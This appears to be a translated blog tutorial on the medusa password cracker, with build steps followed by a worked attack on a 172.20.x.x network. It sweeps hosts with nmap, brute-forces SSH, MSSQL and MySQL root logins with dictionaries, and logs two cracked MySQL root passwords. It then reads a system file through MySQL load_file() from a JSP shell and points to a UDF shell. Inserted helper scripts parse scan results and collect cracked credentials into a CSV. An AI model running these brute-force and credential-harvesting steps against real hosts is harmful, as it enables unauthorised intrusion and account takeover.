On a penetration test of a network of Linux hosts, password cracking is indispensable. Below is a good password-cracking tool; first download it.
medusa is a solid password cracker and reasonably fast. It has to be told the target IPs: medusa does no scanning of its own and only consumes addresses you hand it (a single IP, or a file of IPs), so it is paired with a scanner such as nmap to produce the list of hosts that have the relevant port open. Then point it at a username dictionary and a password dictionary and it cracks away.
./medusa -H vnc.txt -U name.txt -P pass.txt -M vnc -O r.vnc.txt
vnc.txt: the list of IPs with VNC open that will be attacked
name.txt: username dictionary
pass.txt: password dictionary
r.vnc.txt: file the results are written to
wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz or curl -O http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
If libssh2 is not installed, install http://www.libssh2.org/download/libssh2-1.2.6.tar.gz
If it was installed wrongly, run make uninstall and install it again; after installing, rm -rf libssh2-1.2.2 (the extracted source tree). The installation steps:
tar zxvf medusa-2.0.tar.gz
cd medusa-2.0
./configure
The current version is 2.0, but there is something that looks like a bug: on CentOS the default build has no ssh module, even though ./configure --help shows that module defaulting to yes, i.e. it ought to be there. Enable the module explicitly when configuring:
./configure --prefix=/tools/medusa --enable-module-ssh=yes
Check that ssh is listed in the configure summary (enable_module_ssh); if it is not, the build will have no ssh module.
make
make install
On Ubuntu, sudo apt-get install libssh2 (the development package is libssh2-1-dev) is enough; on other Linux distributions such as CentOS it is the manual build above.
Once installed, run medusa -d to check that every module loads. This error is common:
+ ssh.mod : Couldn't load "/usr/local/lib/medusa/modules/ssh.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
libssh2 is installed, but the dynamic loader cannot find it, so the path has to be added by hand. /etc/ld.so.conf lists the directories the loader searches for .so files, normally /lib and /usr/lib; a libssh2 built from source is installed under /usr/local/lib, so that directory must be added and ldconfig run afterwards:
cat /etc/ld.so.conf
include ld.so.conf.d/*.conf
ls ld.so.conf.d/
echo /usr/local/lib > /etc/ld.so.conf.d/local.conf
cat /etc/ld.so.conf.d/*
/usr/local/lib
/usr/lib/mysql
/usr/lib/qt-3.3/lib
ls -l /usr/local/lib/libssh*
-rw-r--r-- 1 root root 752936 06-25 14:33 /usr/local/lib/libssh2.a
-rwxr-xr-x 1 root root 827 06-25 14:33 /usr/local/lib/libssh2.la
lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so -> libssh2.so.1.0.1
lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so.1 -> libssh2.so.1.0.1
-rwxr-xr-x 1 root root 494064 06-25 14:33 /usr/local/lib/libssh2.so.1.0.1
ldconfig
Finally confirm that the module's dependencies now resolve: ldd /usr/local/lib/medusa/modules/ssh.mod (libssh2.so.1 must no longer show "not found").
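To make that last check repeatable across all modules rather than eyeballing ldd for one of them, here is an added example (my own code, not from the original post or from the medusa project). It parses ldd output for unresolved libraries and runs that over every .mod in the install directory; the directory /usr/local/lib/medusa/modules is assumed from the install above, and the sample ldd output is constructed to mirror the failing state described.

```shell
#!/bin/sh
# Added example (not the post's or medusa's code): find medusa modules whose
# shared-library dependencies do not resolve. The "cannot open shared object
# file" error above is exactly what ldd reports as "=> not found".

# Read ldd output on stdin, print one unresolved library name per line.
missing_from_ldd() {
    awk '$2 == "=>" && $3 == "not" && $4 == "found" { print $1 }'
}

# Run ldd over every .mod in a module directory (default: the install path
# assumed from the post) and report modules with unresolved libraries.
# Exit status: 0 all resolved, 1 something missing, 2 no modules found.
check_modules() {
    moddir=${1:-/usr/local/lib/medusa/modules}
    rc=0
    for mod in "$moddir"/*.mod; do
        [ -e "$mod" ] || { echo "no modules in $moddir" >&2; return 2; }
        missing=$(ldd "$mod" 2>/dev/null | missing_from_ldd)
        if [ -n "$missing" ]; then
            printf '%s: missing %s\n' "$(basename "$mod")" "$missing"
            rc=1
        fi
    done
    return $rc
}

# Constructed ldd output for ssh.mod before /usr/local/lib was added to the
# loader path, i.e. what `ldd ssh.mod` prints in the failing state.
SAMPLE_LDD='    linux-vdso.so.1 =>  (0x00007fff5a1ff000)
    libssh2.so.1 => not found
    libc.so.6 => /lib64/libc.so.6 (0x00007f3a2c1e0000)
    /lib64/ld-linux-x86-64.so.2 (0x00007f3a2c7c0000)'

# Self-check on the constructed sample, then the real install if present.
printf '%s\n' "$SAMPLE_LDD" | missing_from_ldd     # prints: libssh2.so.1
if [ -d /usr/local/lib/medusa/modules ]; then
    check_modules || echo "fix: add the library directory under /etc/ld.so.conf.d/ and run ldconfig" >&2
fi
```

After adding /usr/local/lib to ld.so.conf.d and running ldconfig, check_modules should print nothing and exit 0; any module it still names needs its library directory added the same way.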
Once the path is configured, run -d again to confirm the ssh module loads. Now on to actually using medusa:
# medusa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ALERT: Host information must be supplied.
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a different parameter each time and they will all be sent to the module (i.e. -m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [NUM] : Resume scan from host #
Now let's see which modules medusa ships and which services they can crack:
# medusa -d
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
Available modules in "." :
Available modules in "/usr/local/lib/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0
+ http.mod : Brute force module for HTTP : version 2.0
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.0
+ web-form.mod : Brute force module for web forms : version 2.0
+ wrapper.mod : Generic Wrapper Module : version 2.0
The coverage is quite comprehensive and very handy for penetration testing. First pick the targets: scan for machines with ssh open; any subnet will do. Scan the whole range for hosts with port 22 open, fingerprint the service version, and save the results to a file named ssh:
nmap -sV -p22 -oG ssh 172.20.3.0/24
Interesting ports on 172.20.3.132:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:1E:4F:16:B9:DB (Unknown)
Interesting ports on 172.20.3.133:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:1E:4F:13:09:E5 (Unknown)
Interesting ports on 172.20.3.134:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:1E:4F:13:72:49 (Unknown)
………………
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
MAC Address: 00:26:B9:5E:77:7A (Unknown)
Interesting ports on 172.20.3.148:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
MAC Address: 00:26:B9:5E:79:D0 (Unknown)
Interesting ports on 172.20.3.150:
PORT STATE SERVICE VERSION
22/tcp closed ssh
MAC Address: 00:1E:4F:16:B8:2F (Unknown)
Interesting ports on 172.20.3.151:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
MAC Address: 00:1E:4F:16:B9:EF (Unknown)
Interesting ports on 172.20.3.152:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
MAC Address: 00:1A:A0:1C:0B:C2 (Unknown)
Interesting ports on 172.20.3.254:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:10:DB:FF:22:E0 (Juniper Networks)
Nmap finished: 256 IP addresses (64 hosts up) scanned in 33.634 seconds
cat ssh
# Nmap 4.11 scan initiated Fri Jun 25 15:25:50 2010 as: nmap -sV -p22 -oG ssh 172.20.3.0/24
Host: 172.20.3.12 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.13 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.16 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.19 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.28 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.55 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.58 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.61 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.62 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
# Nmap run completed at Fri Jun 25 15:26:24 2010 — 256 IP addresses (64 hosts up) scanned in 33.634 seconds
Something like this. Now pull out the IPs that have ssh open, which is where saving as -oG (grepable output) pays off. The scan is worth a look on its own, too: "protocol 1.99" means that sshd still accepts SSH-1 as well as SSH-2, which is a finding in itself.
grep 22/open ssh | cut -d " " -f 2 >>ssh1.txt
cat ssh1.txt
172.20.3.28
172.20.3.61
172.20.3.62
172.20.3.63
172.20.3.64
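The grep-and-cut pipeline works because only one port was scanned. As an added example (my own code, not from the original post), here is a parser for nmap's grepable output that matches the port number exactly, so it also serves the 1433 scan later on the page or any multi-port scan; the sample -oG output is constructed, with two ports scanned so the substring problem is visible.

```shell
#!/bin/sh
# Added example (not the post's code): extract the hosts on which a given port
# is open from nmap grepable output (-oG). The post's "grep 22/open" is a
# substring match and also hits 2022/open or 1022/open once more than one
# port is scanned; this parses the Ports: field instead.

# Usage: open_hosts PORT [FILE]   (reads stdin when FILE is omitted)
# Prints one IP per line for hosts where PORT is in state "open".
open_hosts() {
    port=$1
    awk -v port="$port" '
        /^Host:/ {
            # The Ports: field is a comma-separated list of
            # port/state/proto/owner/service/rpc/version/ entries.
            if (split($0, f, "Ports: ") < 2) next
            m = split(f[2], entries, ",")
            for (i = 1; i <= m; i++) {
                sub(/^[ \t]+/, "", entries[i])
                split(entries[i], p, "/")
                if (p[1] == port && p[2] == "open") { print $2; break }
            }
        }' ${2:+"$2"}
}

# Constructed -oG output: two ports scanned, so the substring problem shows.
sample_scan() {
    cat <<'EOF'
# Nmap 4.11 scan initiated Fri Jun 25 15:25:50 2010 as: nmap -sV -p22,2022 -oG - 10.0.0.0/29
Host: 10.0.0.1 ()   Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/, 2022/closed/tcp//down///
Host: 10.0.0.2 ()   Ports: 22/closed/tcp//ssh///, 2022/open/tcp//down///
Host: 10.0.0.3 ()   Ports: 22/filtered/tcp//ssh///, 2022/filtered/tcp//down///
Host: 10.0.0.4 ()   Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/, 2022/open/tcp//down///
# Nmap run completed at Fri Jun 25 15:26:24 2010 -- 8 IP addresses (4 hosts up) scanned in 1.2 seconds
EOF
}

# The substring grep counts 3 hosts for "22/open" (10.0.0.2 matches through
# 2022/open); the parser returns only the 2 that really have 22 open.
sample_scan | grep -c 22/open
sample_scan | open_hosts 22
```

With the real scan files from the post this is `open_hosts 22 ssh > ssh1.txt` and `open_hosts 1433 mssql > mssql.txt`.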
Load the ssh module and start cracking ssh:
medusa -H ssh1.txt -u root -P p.txt -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: aaaaaa (1 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (12 of 51 complete)
………………
Cracking means a long wait; ssh is not fast. Keep the dictionary to somewhere between a dozen and a hundred common passwords, otherwise the run drags on. Alternatively raise -t (logins tested concurrently per host) and -T (hosts tested concurrently) for some extra speed; bear in mind that every attempt lands in the target's sshd log, so this is noisy.
I'd still recommend scanning for SQL as well...
nmap -sV -oG mssql 172.20.0-5.1-254 -p1433 // scans 172.20.0.1 through 172.20.5.254
grep 1433/open mssql | cut -d " " -f 2 >>mssql.txt
medusa -H mssql.txt -u sa -P mssql_pass.dic -M mssql
Nothing cracked, so try mysql next:
# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log // results written to pass.log
cat pass.log
# Medusa v.2.0 (2010-06-26 10:42:32)
# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log
ACCOUNT FOUND: [mysql] Host: 172.20.1.115 User: root Password: 12345678 [SUCCESS]
ACCOUNT FOUND: [mysql] Host: 172.20.3.58 User: root Password: mysql [SUCCESS]
# Medusa has finished (2010-06-26 10:55:11).
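Each run (vnc, ssh, mssql, mysql) leaves its own -O log in this format, and only the ACCOUNT FOUND lines matter afterwards. As an added example (my own code, not from the original post or from medusa), here is a small collector that turns those logs into one CSV; the sample log is constructed in the format shown above.

```shell
#!/bin/sh
# Added example (not the post's code): collect the credentials medusa writes
# to its -O log files into one CSV, one line per hit, duplicates removed.

# Usage: found_accounts [LOG...]   (reads stdin when no file is given)
# Output: module,host,user,password
found_accounts() {
    awk '/^ACCOUNT FOUND:/ {
        mod = $0;  sub(/^ACCOUNT FOUND: \[/, "", mod); sub(/].*/, "", mod)
        host = $0; sub(/.* Host: /, "", host);        sub(/ .*/, "", host)
        user = $0; sub(/.* User: /, "", user);        sub(/ Password: .*/, "", user)
        # The password runs up to the trailing " [SUCCESS]" and may contain spaces.
        pass = $0; sub(/.* Password: /, "", pass);    sub(/ \[SUCCESS]$/, "", pass)
        line = mod "," host "," user "," pass
        if (!(line in seen)) { seen[line] = 1; print line }
    }' "$@"
}

# Constructed medusa -O log: banner, a CHECK line, two hits and a duplicate.
sample_log() {
    cat <<'EOF'
# Medusa v.2.0 (2010-06-26 10:42:32)
# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log
ACCOUNT CHECK: [mysql] Host: 192.0.2.10 (1 of 2, 0 complete) User: root (1 of 1, 0 complete) Password: toor (1 of 3 complete)
ACCOUNT FOUND: [mysql] Host: 192.0.2.10 User: root Password: 12345678 [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.0.2.20 User: root Password: pass word [SUCCESS]
ACCOUNT FOUND: [mysql] Host: 192.0.2.10 User: root Password: 12345678 [SUCCESS]
# Medusa has finished (2010-06-26 10:55:11).
EOF
}

sample_log | found_accounts
```

With the post's own files this is `found_accounts pass.log r.vnc.txt > found.csv`, which gives a single list to verify and to write up.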
Good luck this time. Next, connect to mysql on 172.20.1.115 through a JSP shell and run:
select load_file('c:/boot.ini');
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Windows Server 2003, Enterprise" /fastdetect /NoExecute=OptIn
So it is Windows Server 2003, and from here one can go on to drop a UDF through mysql and get a shell... load_file() needs the FILE privilege on the mysql side and a file readable by the mysqld service account; this root had both.
Finally, the official notes: http://www.foofus.net/~jmk/medusa/ChangeLog